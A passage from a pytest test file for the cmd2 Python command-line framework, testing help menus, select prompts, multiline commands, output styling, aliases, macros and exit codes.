@pytest.fixture
def help_app():
app = HelpApp()
return app
def test_custom_command_help(help_app):
out, err = run_cmd(help_app, 'help squat')
expected = normalize('This command does diddly squat...')
assert out == expected
def test_custom_help_menu(help_app):
out, err = run_cmd(help_app, 'help')
verify_help_text(help_app, out)
def test_help_undocumented(help_app):
out, err = run_cmd(help_app, 'help undoc')
assert err[0].startswith("No help on undoc")
def test_help_overridden_method(help_app):
out, err = run_cmd(help_app, 'help edit')
expected = normalize('This overrides the edit command and does nothing.')
assert out == expected
class HelpCategoriesApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category('Some Category')
def do_diddly(self, arg):
"""This command does diddly"""
pass
# This command will be in the "Some Category" section of the help menu even though it has no docstring
@cmd2.with_category("Some Category")
def do_cat_nodoc(self, arg):
pass
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
cmd2.categorize((do_squat, do_edit), 'Custom Category')
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
@pytest.fixture
def helpcat_app():
app = HelpCategoriesApp()
return app
def test_help_cat_base(helpcat_app):
out, err = run_cmd(helpcat_app, 'help')
verify_help_text(helpcat_app, out)
def test_help_cat_verbose(helpcat_app):
out, err = run_cmd(helpcat_app, 'help --verbose')
verify_help_text(helpcat_app, out)
class SelectApp(cmd2.Cmd):
def do_eat(self, arg):
"""Eat something, with a selection of sauces to choose from."""
# Pass in a single string of space-separated selections
sauce = self.select('sweet salty', 'Sauce? ')
result = '{food} with {sauce} sauce, yum!'
result = result.format(food=arg, sauce=sauce)
self.stdout.write(result + '\n')
def do_study(self, arg):
"""Learn something, with a selection of subjects to choose from."""
# Pass in a list of strings for selections
subject = self.select(['math', 'science'], 'Subject? ')
result = 'Good luck learning {}!\n'.format(subject)
self.stdout.write(result)
def do_procrastinate(self, arg):
"""Waste time in your manner of choice."""
# Pass in a list of tuples for selections
leisure_activity = self.select([('Netflix and chill', 'Netflix'), ('YouTube', 'WebSurfing')],
'How would you like to procrastinate? ')
result = 'Have fun procrasinating with {}!\n'.format(leisure_activity)
self.stdout.write(result)
def do_play(self, arg):
"""Play your favorite musical instrument."""
# Pass in an uneven list of tuples for selections
instrument = self.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
result = 'Charm us with the {}...\n'.format(instrument)
self.stdout.write(result)
@pytest.fixture
def select_app():
app = SelectApp()
return app
def test_select_options(select_app, monkeypatch):
# Mock out the read_input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'bacon'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
{} with salty sauce, yum!
""".format(food))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Sauce? ')
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_big(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['3', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'3' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_small(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['0', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'0' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_strings(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "study")
expected = normalize("""
1. math
2. science
Good luck learning {}!
""".format('science'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Subject? ')
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "procrastinate")
expected = normalize("""
1. Netflix
2. WebSurfing
Have fun procrasinating with {}!
""".format('YouTube'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('How would you like to procrastinate? ')
# And verify the expected output to stdout
assert out == expected
def test_select_uneven_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "play")
expected = normalize("""
1. Electric Guitar
2. Drums
Charm us with the {}...
""".format('Drums'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Instrument? ')
# And verify the expected output to stdout
assert out == expected
def test_select_eof(select_app, monkeypatch):
# Ctrl-D during select causes an EOFError that just reprompts the user
read_input_mock = mock.MagicMock(name='read_input', side_effect=[EOFError, 2])
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
def test_select_ctrl_c(outsim_app, monkeypatch, capsys):
# Ctrl-C during select prints ^C and raises a KeyboardInterrupt
read_input_mock = mock.MagicMock(name='read_input', side_effect=KeyboardInterrupt)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
with pytest.raises(KeyboardInterrupt):
outsim_app.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
out = outsim_app.stdout.getvalue()
assert out.rstrip().endswith('^C')
class HelpNoDocstringApp(cmd2.Cmd):
greet_parser = argparse.ArgumentParser()
greet_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser_and_unknown_args(greet_parser)
def do_greet(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
def test_help_with_no_docstring(capsys):
app = HelpNoDocstringApp()
app.onecmd_plus_hooks('greet -h')
out, err = capsys.readouterr()
assert err == ''
assert out == """usage: greet [-h] [-s]
optional arguments:
-h, --help show this help message and exit
-s, --shout N00B EMULATION MODE
"""
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_good():
import platform
editor = 'vi'
path = utils.which(editor)
if 'azure' in platform.release().lower():
# vi doesn't exist on VSTS Hosted Linux agents
assert not path
else:
# Assert that the vi editor was found because it should exist on all Mac and Linux systems
assert path
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_bad():
nonexistent_editor = 'this_editor_does_not_exist.exe'
path = utils.which(nonexistent_editor)
# Assert that the non-existent editor wasn't found
assert path is None
class MultilineApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, multiline_commands=['orate'], **kwargs)
orate_parser = argparse.ArgumentParser()
orate_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser_and_unknown_args(orate_parser)
def do_orate(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
@pytest.fixture
def multiline_app():
app = MultilineApp()
return app
def test_multiline_complete_empty_statement_raises_exception(multiline_app):
with pytest.raises(cmd2.EmptyStatement):
multiline_app._complete_statement('')
def test_multiline_complete_statement_without_terminator(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', return_value='\n')
builtins.input = m
command = 'orate'
args = 'hello world'
line = '{} {}'.format(command, args)
statement = multiline_app._complete_statement(line)
assert statement == args
assert statement.command == command
assert statement.multiline_command == command
def test_multiline_complete_statement_with_unclosed_quotes(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['quotes', '" now closed;'])
builtins.input = m
line = 'orate hi "partially open'
statement = multiline_app._complete_statement(line)
assert statement == 'hi "partially open\nquotes\n" now closed'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
assert statement.terminator == ';'
def test_multiline_input_line_to_statement(multiline_app):
# Verify _input_line_to_statement saves the fully entered input line for multiline commands
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['person', '\n'])
builtins.input = m
line = 'orate hi'
statement = multiline_app._input_line_to_statement(line)
assert statement.raw == 'orate hi\nperson\n'
assert statement == 'hi person'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
def test_clipboard_failure(base_app, capsys):
# Force cmd2 clipboard to be disabled
base_app._can_clip = False
# Redirect command output to the clipboard when a clipboard isn't present
base_app.onecmd_plus_hooks('help > ')
# Make sure we got the error output
out, err = capsys.readouterr()
assert out == ''
assert 'Cannot redirect to paste buffer;' in err and 'pyperclip' in err
class CommandResultApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_affirmative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=True)
def do_negative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=False)
def do_affirmative_no_data(self, arg):
self.last_result = cmd2.CommandResult(arg)
def do_negative_no_data(self, arg):
self.last_result = cmd2.CommandResult('', arg)
@pytest.fixture
def commandresult_app():
app = CommandResultApp()
return app
def test_commandresult_truthy(commandresult_app):
arg = 'foo'
run_cmd(commandresult_app, 'affirmative {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=True)
run_cmd(commandresult_app, 'affirmative_no_data {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg)
def test_commandresult_falsy(commandresult_app):
arg = 'bar'
run_cmd(commandresult_app, 'negative {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=False)
run_cmd(commandresult_app, 'negative_no_data {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult('', arg)
def test_is_text_file_bad_input(base_app):
# Test with a non-existent file
file_is_valid = utils.is_text_file('does_not_exist.txt')
assert not file_is_valid
# Test with a directory
dir_is_valid = utils.is_text_file('.')
assert not dir_is_valid
def test_eof(base_app):
# Only thing to verify is that it returns True
assert base_app.do_eof('')
def test_echo(capsys):
app = cmd2.Cmd()
app.echo = True
commands = ['help history']
app.runcmds_plus_hooks(commands)
out, err = capsys.readouterr()
assert out.startswith('{}{}\n'.format(app.prompt, commands[0]) + HELP_HISTORY.split()[0])
def test_read_input_rawinput_true(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
app = cmd2.Cmd()
app.use_rawinput = True
# Mock out input() to return input_str
monkeypatch.setattr("builtins.input", lambda *args: input_str)
# isatty is True
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
line = app.read_input(prompt_str)
assert line == input_str
# isatty is False
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=False)):
# echo True
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# echo False
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
def test_read_input_rawinput_false(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
def make_app(isatty: bool, empty_input: bool = False):
"""Make a cmd2 app with a custom stdin"""
app_input_str = '' if empty_input else input_str
fakein = io.StringIO('{}'.format(app_input_str))
fakein.isatty = mock.MagicMock(name='isatty', return_value=isatty)
new_app = cmd2.Cmd(stdin=fakein)
new_app.use_rawinput = False
return new_app
# isatty True
app = make_app(isatty=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == prompt_str
# isatty True, empty input
app = make_app(isatty=True, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert out == prompt_str
# isatty is False, echo is True
app = make_app(isatty=False)
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# isatty is False, echo is False
app = make_app(isatty=False)
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
# isatty is False, empty input
app = make_app(isatty=False, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert not out
def test_read_command_line_eof(base_app, monkeypatch):
read_input_mock = mock.MagicMock(name='read_input', side_effect=EOFError)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
line = base_app._read_command_line("Prompt> ")
assert line == 'eof'
def test_poutput_string(outsim_app):
msg = 'This is a test'
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert out == expected
def test_poutput_zero(outsim_app):
msg = 0
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = str(msg) + '\n'
assert out == expected
def test_poutput_empty_string(outsim_app):
msg = ''
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = '\n'
assert out == expected
def test_poutput_none(outsim_app):
msg = None
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = 'None\n'
assert out == expected
def test_poutput_ansi_always(outsim_app):
msg = 'Hello World'
ansi.allow_ansi = ansi.ANSI_ALWAYS
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = colored_msg + '\n'
assert colored_msg != msg
assert out == expected
def test_poutput_ansi_never(outsim_app):
msg = 'Hello World'
ansi.allow_ansi = ansi.ANSI_NEVER
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert colored_msg != msg
assert out == expected
# These are invalid names for aliases and macros
invalid_command_name = [
'""', # Blank name
constants.COMMENT_CHAR,
'!no_shortcut',
'">"',
'"no>pe"',
'"no spaces"',
'"nopipe|"',
'"noterm;"',
'noembedded"quotes',
]
def test_get_alias_completion_items(base_app):
run_cmd(base_app, 'alias create fake run_pyscript')
run_cmd(base_app, 'alias create ls !ls -hal')
results = base_app._get_alias_completion_items()
assert len(results) == len(base_app.aliases)
for cur_res in results:
assert cur_res in base_app.aliases
assert cur_res.description == base_app.aliases[cur_res]
def test_get_macro_completion_items(base_app):
run_cmd(base_app, 'macro create foo !echo foo')
run_cmd(base_app, 'macro create bar !echo bar')
results = base_app._get_macro_completion_items()
assert len(results) == len(base_app.macros)
for cur_res in results:
assert cur_res in base_app.macros
assert cur_res.description == base_app.macros[cur_res].value
def test_get_settable_completion_items(base_app):
results = base_app._get_settable_completion_items()
for cur_res in results:
assert cur_res in base_app.settable
assert cur_res.description == base_app.settable[cur_res]
def test_alias_no_subcommand(base_app):
out, err = run_cmd(base_app, 'alias')
assert "Usage: alias [-h]" in err[0]
assert "Error: the following arguments are required: subcommand" in err[1]
def test_alias_create(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake run_pyscript')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of aliases
out, err = run_cmd(base_app, 'alias list')
assert out == normalize('alias create fake run_pyscript')
# Look up the new alias
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake run_pyscript')
def test_alias_create_with_quoted_value(base_app):
"""Demonstrate that quotes in alias value will be preserved (except for redirectors and terminators)"""
# Create the alias
out, err = run_cmd(base_app, 'alias create fake help ">" "out file.txt" ";"')
assert out == normalize("Alias 'fake' created")
# Look up the new alias (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake help > "out file.txt" ;')
@pytest.mark.parametrize('alias_name', invalid_command_name)
def test_alias_create_invalid_name(base_app, alias_name, capsys):
out, err = run_cmd(base_app, 'alias create {} help'.format(alias_name))
assert "Invalid alias name" in err[0]
def test_alias_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'alias create help stuff')
assert "Alias cannot have the same name as a command" in err[0]
def test_alias_create_with_macro_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'macro create {} help'.format(macro))
out, err = run_cmd(base_app, 'alias create {} help'.format(macro))
assert "Alias cannot have the same name as a macro" in err[0]
def test_alias_that_resolves_into_comment(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake ' + constants.COMMENT_CHAR + ' blah blah')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert not out
assert not err
def test_alias_list_invalid_alias(base_app):
# Look up invalid alias
out, err = run_cmd(base_app, 'alias list invalid')
assert "Alias 'invalid' not found" in err[0]
def test_alias_delete(base_app):
# Create an alias
run_cmd(base_app, 'alias create fake run_pyscript')
# Delete the alias
out, err = run_cmd(base_app, 'alias delete fake')
assert out == normalize("Alias 'fake' deleted")
def test_alias_delete_all(base_app):
out, err = run_cmd(base_app, 'alias delete --all')
assert out == normalize("All aliases deleted")
def test_alias_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'alias delete fake')
assert "Alias 'fake' does not exist" in err[0]
def test_alias_delete_no_name(base_app):
out, err = run_cmd(base_app, 'alias delete')
assert "Either --all or alias name(s)" in err[0]
def test_multiple_aliases(base_app):
alias1 = 'h1'
alias2 = 'h2'
run_cmd(base_app, 'alias create {} help'.format(alias1))
run_cmd(base_app, 'alias create {} help -v'.format(alias2))
out, err = run_cmd(base_app, alias1)
verify_help_text(base_app, out)
out, err = run_cmd(base_app, alias2)
verify_help_text(base_app, out)
def test_macro_no_subcommand(base_app):
out, err = run_cmd(base_app, 'macro')
assert "Usage: macro [-h]" in err[0]
assert "Error: the following arguments are required: subcommand" in err[1]
def test_macro_create(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake run_pyscript')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of macros
out, err = run_cmd(base_app, 'macro list')
assert out == normalize('macro create fake run_pyscript')
# Look up the new macro
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake run_pyscript')
def test_macro_create_with_quoted_value(base_app):
"""Demonstrate that quotes in macro value will be preserved (except for redirectors and terminators)"""
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help ">" "out file.txt" ";"')
assert out == normalize("Macro 'fake' created")
# Look up the new macro (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake help > "out file.txt" ;')
@pytest.mark.parametrize('macro_name', invalid_command_name)
def test_macro_create_invalid_name(base_app, macro_name):
out, err = run_cmd(base_app, 'macro create {} help'.format(macro_name))
assert "Invalid macro name" in err[0]
def test_macro_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'macro create help stuff')
assert "Macro cannot have the same name as a command" in err[0]
def test_macro_create_with_alias_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'alias create {} help'.format(macro))
out, err = run_cmd(base_app, 'macro create {} help'.format(macro))
assert "Macro cannot have the same name as an alias" in err[0]
def test_macro_create_with_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake help -v')
verify_help_text(base_app, out)
def test_macro_create_with_escaped_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {{1}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert err[0].startswith('No help on {1}')
def test_macro_usage_with_missing_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake arg1')
assert "expects at least 2 argument(s)" in err[0]
def test_macro_usage_with_exta_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake alias create')
assert "Usage: alias create" in out[0]
def test_macro_create_with_missing_arg_nums(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {3}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_create_with_invalid_arg_num(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {-1} {0}')
assert "Argument numbers must be greater than 0" in err[0]
def test_macro_create_with_unicode_numbered_arg(base_app):
# Create the macro expecting 1 argument
out, err = run_cmd(base_app, 'macro create fake help {\N{ARABIC-INDIC DIGIT ONE}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert "expects at least 1 argument(s)" in err[0]
def test_macro_create_with_missing_unicode_arg_nums(base_app):
out, err = run_cmd(base_app, 'macro create fake help {1} {\N{ARABIC-INDIC DIGIT THREE}}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_that_resolves_into_comment(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} blah blah')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake ' + constants.COMMENT_CHAR)
assert not out
assert not err
def test_macro_list_invalid_macro(base_app):
# Look up invalid macro
out, err = run_cmd(base_app, 'macro list invalid')
assert "Macro 'invalid' not found" in err[0]
def test_macro_delete(base_app):
# Create an macro
run_cmd(base_app, 'macro create fake run_pyscript')
# Delete the macro
out, err = run_cmd(base_app, 'macro delete fake')
assert out == normalize("Macro 'fake' deleted")
def test_macro_delete_all(base_app):
out, err = run_cmd(base_app, 'macro delete --all')
assert out == normalize("All macros deleted")
def test_macro_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'macro delete fake')
assert "Macro 'fake' does not exist" in err[0]
def test_macro_delete_no_name(base_app):
out, err = run_cmd(base_app, 'macro delete')
assert "Either --all or macro name(s)" in err[0]
def test_multiple_macros(base_app):
macro1 = 'h1'
macro2 = 'h2'
run_cmd(base_app, 'macro create {} help'.format(macro1))
run_cmd(base_app, 'macro create {} help -v'.format(macro2))
out, err = run_cmd(base_app, macro1)
verify_help_text(base_app, out)
out2, err2 = run_cmd(base_app, macro2)
verify_help_text(base_app, out2)
assert len(out2) > len(out)
def test_nonexistent_macro(base_app):
from cmd2.parsing import StatementParser
exception = None
try:
base_app._resolve_macro(StatementParser().parse('fake'))
except KeyError as e:
exception = e
assert exception is not None
def test_perror_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.perror(msg)
out, err = capsys.readouterr()
assert err == ansi.style_error(msg) + end
def test_perror_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.perror(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_pwarning_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.pwarning(msg)
out, err = capsys.readouterr()
assert err == ansi.style_warning(msg) + end
def test_pwarning_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.pwarning(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_ppaged(outsim_app):
msg = 'testing...'
end = '\n'
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_blank(outsim_app):
msg = ''
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_none(outsim_app):
msg = None
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_strips_ansi_when_redirecting(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_TERMINAL
outsim_app._redirecting = True
outsim_app.ppaged(ansi.style(msg, fg='red'))
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_strips_ansi_when_redirecting_if_always(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
outsim_app._redirecting = True
colored_msg = ansi.style(msg, fg='red')
outsim_app.ppaged(colored_msg)
out = outsim_app.stdout.getvalue()
assert out == colored_msg + end
# we override cmd.parseline() so we always get consistent
# command parsing by parent methods we don't override
# don't need to test all the parsing logic here, because
# parseline just calls StatementParser.parse_command_only()
def test_parseline_empty(base_app):
statement = ''
command, args, line = base_app.parseline(statement)
assert not command
assert not args
assert not line
def test_parseline(base_app):
statement = " command with 'partially completed quotes "
command, args, line = base_app.parseline(statement)
assert command == 'command'
assert args == "with 'partially completed quotes"
assert line == statement.strip()
def test_onecmd_raw_str_continue(outsim_app):
line = "help"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert not stop
verify_help_text(outsim_app, out)
def test_onecmd_raw_str_quit(outsim_app):
line = "quit"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert stop
assert out == ''
def test_onecmd_add_to_history(outsim_app):
line = "help"
saved_hist_len = len(outsim_app.history)
# Allow command to be added to history
outsim_app.onecmd(line, add_to_history=True)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len + 1
saved_hist_len = new_hist_len
# Prevent command from being added to history
outsim_app.onecmd(line, add_to_history=False)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len
def test_get_all_commands(base_app):
# Verify that the base app has the expected commands
commands = base_app.get_all_commands()
expected_commands = ['_relative_run_script', 'alias', 'edit', 'eof', 'help', 'history', 'macro',
'py', 'quit', 'run_pyscript', 'run_script', 'set', 'shell', 'shortcuts']
assert commands == expected_commands
def test_get_help_topics(base_app):
# Verify that the base app has no additional help_foo methods
custom_help = base_app.get_help_topics()
assert len(custom_help) == 0
def test_get_help_topics_hidden():
# Verify get_help_topics() filters out hidden commands
class TestApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_my_cmd(self, args):
pass
def help_my_cmd(self, args):
pass
app = TestApp()
assert 'my_cmd' in app.get_help_topics()
app.hidden_commands.append('my_cmd')
assert 'my_cmd' not in app.get_help_topics()
class ReplWithExitCode(cmd2.Cmd):
""" Example cmd2 application where we can specify an exit code when existing."""
def __init__(self):
super().__init__(allow_cli_args=False)
@cmd2.with_argument_list
def do_exit(self, arg_list) -> bool:
"""Exit the application with an optional exit code.
Usage: exit [exit_code]
Where:
* exit_code - integer exit code to return to the shell
"""
# If an argument was provided
if arg_list:
try:
self.exit_code = int(arg_list[0])
except ValueError:
self.perror("{} isn't a valid integer exit code".format(arg_list[0]))
self.exit_code = -1
# Return True to stop the command loop
return True
def postloop(self) -> None:
"""Hook method executed once when the cmdloop() method is about to return."""
self.poutput('exiting with code: {}'.format(self.exit_code))
@pytest.fixture
def exit_code_repl():
app = ReplWithExitCode()
app.stdout = utils.StdSim(app.stdout)
return app
def test_exit_code_default(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit')
builtins.input = m
expected = 'exiting with code: 0\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_exit_code_nonzero(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit 23')
builtins.input = m
expected = 'exiting with code: 23\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
class AnsiApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_echo(self, args):
self.poutput(args)
self.perror(args)
def do_echo_error(self, args):
self.poutput(ansi.style(args, fg='red'))
# perror uses colors by default
self.perror(args)
def test_ansi_pouterr_always_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some escape sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
